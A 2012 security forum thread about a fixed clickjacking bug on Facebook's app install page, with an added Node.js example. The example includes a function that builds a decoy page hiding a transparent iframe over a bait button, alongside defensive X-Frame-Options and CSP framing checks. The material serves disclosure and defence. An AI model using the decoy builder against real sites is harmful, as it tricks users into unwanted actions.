08-01-2012, 12:36 PM #1 Security Researcher
Facebook 3rd Party App Installing Page UI Redressing Vulnerability
#Title: Facebook 3rd Party App Installing Page UI Redressing Vulnerability
#Author: Sandeep Kamble
#Business Risk : Medium Risk
#Attack Type: UI Redressing Vulnerability
#Tested Browser: Firefox 3.6.27
#OS: Win 7 / Linux
#Reported Date: July 26, 2011
Summary
G'day! Recently I submitted a UI Redressing vulnerability to Facebook. The vulnerability enables an attacker to install any malicious 3rd-party application into the victim's Facebook account.
Overview
Clickjacking (UI Redressing) is an exploit in which code on a malicious website is hidden beneath apparently legitimate buttons.
The strange part of this testing was that the Facebook 3rd-party App installing page was already protected against UI redressing. The protection works perfectly on Chrome, Safari, IE and the new version of FF.
But the UI redressing protection on the Facebook 3rd-party App installing page failed to work on Firefox 3.6.27.
So in Firefox 3.6.27 I iframed the page perfectly and made a perfect POC for the Facebook team.
Code: Public POC:

Special thanks to the FB team for fixing this bug! My team G4H
Thanks
[S] - Sandeep
Last edited by [s]; 08-04-2012 at 10:12 AM.
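The post says the page was already protected against framing and that the protection failed only in Firefox 3.6.27, without saying why. The following is an added example (not code from the original post, and not Facebook's own protection) that models both halves of such a UI redressing case in plain Node.js: the attacker's decoy page, which stacks a transparent iframe of the target over a bait button, and the check a compliant browser performs on the target's response headers before allowing the frame. It also shows why a server-side fix is only as good as the client that enforces it, and carries the legacy script-only frame-buster for comparison. All URLs, origins, header values and pixel offsets are made-up assumptions.

```javascript
// Added example: not from the original post and not Facebook's code.
// Models a clickjacking (UI redressing) case end to end in Node.js.
// Every URL, origin and pixel offset below is a constructed assumption.

// --- Attacker side ---------------------------------------------------------
// buttonX/buttonY: where the target's real "Allow"/"Install" button sits
// inside the framed page. The iframe is shifted so that button lands exactly
// under the visible bait button, then made transparent but stacked on top,
// so the victim's click goes to the target and not to the bait.
function buildDecoyPage(targetUrl, buttonX, buttonY, baitX = 200, baitY = 150) {
  const frameLeft = baitX - buttonX;
  const frameTop = baitY - buttonY;
  return `<!doctype html>
<html><body>
<button style="position:absolute;left:${baitX}px;top:${baitY}px;z-index:1">
  Click here to claim your prize
</button>
<iframe src="${targetUrl}" scrolling="no"
  style="position:absolute;left:${frameLeft}px;top:${frameTop}px;
         width:800px;height:600px;opacity:0;z-index:2;border:0"></iframe>
</body></html>`;
}

// --- Defender side ---------------------------------------------------------
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// CSP frame-ancestors: 'none', 'self', '*', or host-sources such as
// https://*.partner.example. Ports and paths are ignored here for brevity.
function cspFrameAncestorsAllow(sources, framer, target) {
  if (sources.length === 0 || sources.includes("'none'")) return false;
  const f = new URL(framer);
  for (const src of sources) {
    if (src === "*") return true;
    if (src === "'self'") {
      if (originOf(framer) === originOf(target)) return true;
      continue;
    }
    const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^\/:]+)/i.exec(src);
    if (!m) continue;
    const [, scheme, wildcard, host] = m;
    if (scheme && scheme.toLowerCase() + ":" !== f.protocol) continue;
    const h = host.toLowerCase();
    if (wildcard ? f.hostname.endsWith("." + h) : f.hostname === h) return true;
  }
  return false;
}

// X-Frame-Options: DENY, SAMEORIGIN, or the legacy ALLOW-FROM <uri>.
// A value the browser does not recognise is ignored (RFC 7034), so a typo
// such as "ALLOWALL" or "SAME-ORIGIN" silently leaves the page frameable.
function xfoAllows(value, framer, target) {
  const v = value.trim();
  if (/^DENY$/i.test(v)) return false;
  if (/^SAMEORIGIN$/i.test(v)) return originOf(framer) === originOf(target);
  const m = /^ALLOW-FROM\s+(\S+)$/i.exec(v);
  if (m) return originOf(m[1]) === originOf(framer);
  return true;
}

// headers: lower-cased header name -> value. browser: which protections the
// client enforces. A client that honours neither loads the frame no matter
// what the server sent: a server-side fix cannot close that on its own.
function canBeFramed(headers, framer, target, browser = { csp: true, xfo: true }) {
  const csp = headers["content-security-policy"];
  if (csp && browser.csp) {
    const directive = csp.split(";")
      .map((d) => d.trim().split(/\s+/))
      .find((d) => d[0].toLowerCase() === "frame-ancestors");
    // When frame-ancestors is present, CSP decides and X-Frame-Options is ignored.
    if (directive) return cspFrameAncestorsAllow(directive.slice(1), framer, target);
  }
  const xfo = headers["x-frame-options"];
  if (xfo && browser.xfo) return xfoAllows(xfo, framer, target);
  return true;
}

// Script-only defence from before the headers existed. The framing page can
// neutralise it (a sandboxed iframe without allow-top-navigation, or an
// onbeforeunload handler that cancels the redirect), so it belongs only as
// defence in depth beneath the headers above.
const LEGACY_FRAME_BUSTER = "if (top !== self) { top.location = self.location; }";

// Constructed sample run.
const TARGET = "https://apps.example.com/install?app_id=123";
const ATTACKER = "https://evil.example.net/";
console.log(canBeFramed({ "x-frame-options": "DENY" }, ATTACKER, TARGET));     // false
console.log(canBeFramed({ "x-frame-options": "ALLOWALL" }, ATTACKER, TARGET)); // true
console.log(canBeFramed({ "x-frame-options": "DENY" }, ATTACKER, TARGET,
                        { csp: false, xfo: false }));                          // true
```

Run it with `node clickjack.js`. The useful habit is to test the framing check from the attacker's origin with the browsers you actually care about, not just to confirm the header is in the response: the third sample line is exactly the case of a client that does not enforce the protection the server sends.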
08-01-2012, 12:45 PM #2 Security Researcher (fb1h2s)
Good job. Any idea why the protection was not working on FF, some JS failure? Do you have the previous code with you, to check how Facebook dealt with this issue?
Hacking is a matter of time, knowledge and patience.
08-01-2012, 06:28 PM #3 Security Researcher
08-01-2012, 10:59 PM #4 Web Security Consultant (amolnaik4)
Very nice bug Sandeep... keep it up.
08-02-2012, 04:57 PM #5 Security Researcher
08-07-2012, 08:16 PM #6
Great find, keep it up bro!! Go G4H!
When the way comes to an end, then change - having changed, you pass through